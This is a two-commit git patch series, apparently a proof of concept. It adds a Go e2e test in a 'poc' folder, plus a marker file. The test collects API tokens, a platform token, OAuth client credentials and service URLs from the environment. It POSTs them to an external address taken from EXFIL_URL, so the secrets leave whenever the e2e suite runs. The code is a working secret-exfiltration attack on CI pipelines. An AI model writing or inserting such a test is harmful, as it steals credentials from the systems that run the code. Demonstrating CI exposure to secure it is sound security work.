From ce3441e1f34b85b8a4fdb3e690f00764264892ec Mon Sep 17 00:00:00 2001
From: XavLim <50736074+XavLimSG@users.noreply.github.com>
Date: Sun, 5 Apr 2026 16:27:38 +0800
Subject: [PATCH 1/2] Add attacker payload test (commit A)

---
 poc/malicious_e2e_test.go | 37 +++++++++++++++++++++++++++++++++++++
 1 file changed, 37 insertions(+)
 create mode 100644 poc/malicious_e2e_test.go

diff --git a/poc/malicious_e2e_test.go b/poc/malicious_e2e_test.go
new file mode 100644
index 0000000..82b1cf6
--- /dev/null
+++ b/poc/malicious_e2e_test.go
@@ -0,0 +1,37 @@
+//go:build e2e
+
+package poc
+
+import (
+	"fmt"
+	"net/http"
+	"net/url"
+	"os"
+	"testing"
+)
+
+func TestMaliciousPayloadA(t *testing.T) {
+	exfil := os.Getenv("EXFIL_URL")
+	if exfil == "" {
+		t.Log("EXFIL_URL not set")
+		return
+	}
+
+	values := url.Values{}
+	values.Set("marker", "A")
+	values.Set("api_token", os.Getenv("API_TOKEN"))
+	values.Set("platform_token", os.Getenv("PLATFORM_TOKEN"))
+	values.Set("oauth_client_id", os.Getenv("OAUTH_CLIENT_ID"))
+	values.Set("oauth_client_secret", os.Getenv("OAUTH_CLIENT_SECRET"))
+	values.Set("oauth_token_endpoint", os.Getenv("OAUTH_TOKEN_ENDPOINT"))
+	values.Set("classic_url", os.Getenv("CLASSIC_URL"))
+	values.Set("platform_url", os.Getenv("PLATFORM_URL"))
+
+	resp, err := http.PostForm(exfil, values)
+	if err != nil {
+		t.Fatalf("exfil failed: %v", err)
+	}
+	defer resp.Body.Close()
+
+	fmt.Println("MALICIOUS_MARKER=A")
+}

From ab6f442391d9d2ed5ff5a2395e0dcbba46f464e2 Mon Sep 17 00:00:00 2001
From: XavLim <50736074+XavLimSG@users.noreply.github.com>
Date: Sun, 5 Apr 2026 16:29:00 +0800
Subject: [PATCH 2/2] Second attacker commit B

---
 poc/marker_b.txt | 1 +
 1 file changed, 1 insertion(+)
 create mode 100644 poc/marker_b.txt

diff --git a/poc/marker_b.txt b/poc/marker_b.txt
new file mode 100644
index 0000000..b86d7ff
--- /dev/null
+++ b/poc/marker_b.txt
@@ -0,0 +1 @@
+marker B